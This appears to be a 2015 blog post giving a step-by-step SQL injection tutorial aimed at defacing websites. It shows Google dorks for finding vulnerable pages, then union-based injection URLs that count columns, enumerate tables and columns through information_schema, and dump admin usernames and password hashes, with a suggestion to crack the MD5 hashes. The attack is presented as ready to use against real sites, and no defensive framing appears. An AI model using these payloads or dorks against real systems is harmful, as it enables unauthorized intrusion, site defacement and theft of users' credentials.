SCM Player

Friday, 27 February 2015

SQL Injection | Step by Step deface website

What is SQL Injection?

SQL is Structured Query Language. This language is used to work on the database. Commands such as SELECT, INSERT,DELETE are used to update information in the database.
In this type of Attack, we make use of a vulnerability where in we supply our own commands to the website’s database and successfully deface it :D . This vulnerability occurs when the user’s input is not filtered or improperly filtered .

 

Finding A Vulnerable Website

The first step is obviously finding a vulnerable website. There are a lot of ways to do so. the most common method of searching is by using dorks.
 

Dorks

Dorks are an input query into a search engine (Google) which attempt to find websites with the given text provided in the dork itself. Basically it helps you to find websites with a specific code in their url which you know is a sign of vulnerability.
 

Using Dorks

Now basically what a dork does is uses Google’s “inurl” command to return websites which have a specific set of vulnerable words in url. For that, we need to know which words in the url make a website potentially vulnerable to a SQL injection attack. Many websites offer a comprehensive list of google dorks. For example, the l33tmir website has a list of hundreds of google dorks. However, creativity is your best tool when it comes to finding vulnerable sites, and after practicing with some google dorks, you will be able to create your own. A few dorks have been listed below. What you have to do is paste them into the google search bar and google will return potentially vulnerable sites. 
NOTE: Don’t mind the root@kali:~# behind the code. I have implemented this on all the code on my blog, and the majority of it is really on Kali Linux so it makes sense there but not here.
inurl:”products.php?prodID=”
inurl:buy.php?category=

Exploiting the vulnerability 

You have a vulnerable URL
www.something.com/news/news.php?id=130
Ok , Now how do you deface it   ??

Finding number of columns

Now put the following in the url
http://www.something.com/news/news.php?id=130 order by 10–
Now we told the database to order it by 10th column. Your job is to find how many columns are there in the table. So if order by 10 gave you an error, replace 10 by 9 and try it. Or if 10 gave a valid reply put 11 and try.
Also, the — “are two dashes – -” in the end means “comment”. So anything after this statement is commented off and only our query is put in.
So assume I got error for order by 10, then I tried order by 9 and so on.. Finally I got no error at 6 and error at 7. Hence, the Table has 6 columns .

Find Vulnerable columns


Now we will use union all and select command to find a vulnerable column.Remember to replace that ID number by – that. Like here, I have made it id= -130.
http://www.something.com/news/news.php?id=-130 union select all 1,2,3,4,5,6,–
Since it has 6 columns, we do select all 1,2,3,4,5,6 and a – at the end.
This will give an output . Whichever column number comes out as bold in the output, that column is vulnerable. Just remember this column number. Assume I got 2 as the vulnerable column.

Finding tables


Now our job is to find the different tables in the database. We do the following:
http://www.something.com/news/news.php?id=-130 union select all group_concat(table_name),3,4,5,6 from information_schema.tables where  table_schema=database() –
Here group_concat(table_name) will give you all the table names in the database. Infromation_schema hold information about the database. So we are just querying from that .

Finding Column names


Similarly get all the columns by simply replacing ‘table’ with ‘column’
http://www.something.com/news/news.php?id=-130 union select all   1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()–
Now you will be able to find all the column names from all the tables. After all the columns from one table, there will be a “id” and then all columns from next table and so on.
If this doesn’t work then you can do
http://www.something.com/news/news.php?id=-130 union select all   1,group_concat(column_name),3,4,5,6 from information_schema.columns where  table_name=”some table you got from the previous step”–

Final Step

Now in list of columns look for some interesting columns like username or password. So now you should know the table name and column names you want. Eg username and password columns from tbl_admin table
http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tbl_admin–
Now I just put the column names in the group_concat with 0x3a in between which is ascii for colon and tbl_admin is the table name where these columns are.
Now I got output something like
admin:”encrypted hash”,user2:”encrypted hash”, and so on…
So usernames are  not encrypted here and passwords are encrypted.
So your job is almost done. Now you will get all the users and passwords. Usually the passwords will be encrypted in md5. You can decrypt it. Just use google :p
 
 
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)